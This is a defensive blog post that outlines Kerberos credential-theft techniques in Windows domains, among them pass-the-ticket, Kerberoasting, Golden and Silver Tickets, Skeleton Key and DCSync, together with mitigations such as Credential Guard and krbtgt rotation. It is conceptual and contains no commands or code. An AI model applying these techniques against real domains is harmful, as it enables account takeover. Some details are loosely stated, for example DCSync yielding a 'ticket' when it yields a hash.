top of page

Post 5: Credential Theft: Understanding and Securing Tickets

In the intricate realm of Windows enterprise security, the reliance on the Kerberos authentication protocol is ubiquitous. This protocol, fundamental to the authentication process, employs Ticket Granting Tickets (TGTs) and service tickets to validate user accounts and access specific services. However, with the prevalence of Kerberos comes a set of sophisticated threats that leverage various techniques to compromise authentication and gain unauthorized access. In this comprehensive blog post, we will dissect the intricacies of Kerberos authentication threats, exploring everything from ticket attacks to the elusive Golden Ticket.


The Kerberos Authentication Landscape

Kerberos Authentication Protocol:

  • Utilizes TGTs for user authentication and service tickets for service authentication.

  • Tickets are valid for 10 hours by default, providing pre-authentication during this time frame.

  • Nearly all Windows activities are linked to user accounts, making the authentication burden significant.


Ticket Attacks: Exploiting Kerberos Weaknesses

1. Pass the Ticket:

  • Attackers can dump tickets from memory using tools like Mimikatz.

  • Imported tickets can be used to authenticate as specific users or services.

  • Allows user "transplant" without knowledge of user hash or password.

2. Overpass the Hash (Pass the Key):

  • Attackers dump account hash and use it to request service tickets.

  • Authenticates via Kerberos, bypassing NTLM restrictions.

3. Kerberoasting:

  • Any domain user can request a ticket for any domain service.

  • Attackers seek tickets for high-privilege service accounts and derive plaintext passwords.

4. Golden Ticket:

  • An attacker gains administrator credentials on the domain controller.

  • Extracts krbtgt account hash to create TGTs that do not expire.

  • Offers unprecedented persistence even after enterprise-wide password resets.

5. Silver Ticket:

  • Attackers create a "Silver Ticket" using a dumped computer account hash.

  • Grants all-access pass for a single service or computer, impersonating any user for that system.

6. Skeleton Key:

  • Attackers patch LSASS to enable a backdoor password for any valid domain user.

  • Provides persistent access even after a user changes their password.

7. DCSync:

  • Exploits MS-DRSR protocol to impersonate a DC and request password hashes.

  • Requires high-level privileges and allows extraction of KRBTGT ticket for Golden Ticket creation.


Mitigation Strategies: Defending Against Kerberos Threats

1. Credential Guard:

  • Windows 10+ feature using virtual machine isolation to protect hashes and tickets.

  • Prevents dumping tickets for pass-the-ticket and hash attacks.

2. Remote Credential Guard and Restricted Admin:

  • Prevents the passing of user credentials to remote systems during interactive sessions.

  • Mitigates pass-the-ticket attacks.

3. Managed Service Accounts (MSA) and Group Managed Service Accounts (gMSA):

  • Automatic password changes every 30 days and complex passwords.

  • Mitigates Kerberoasting by reducing the lifespan of attacker-collected tickets.

4. Active Monitoring:

  • Actively monitor high-privilege service accounts for anomalous activity.

  • Regularly change service account passwords.

5. Changing krbtgt Account Password:

  • Regularly change the krbtgt account password to detect and eliminate Golden Tickets.


Conclusion

Kerberos authentication threats pose a formidable challenge in the Windows enterprise environment. Understanding the nuances of these attacks and implementing robust mitigation strategies is imperative for organizations to fortify their security posture. By combining technical defenses, active monitoring, and proactive measures, enterprises can significantly reduce the risk of falling victim to Kerberos authentication threats. Stay vigilant, stay informed, and stay ahead of evolving cybersecurity challenges.


Akash Patel

15 views0 comments

Comments


bottom of page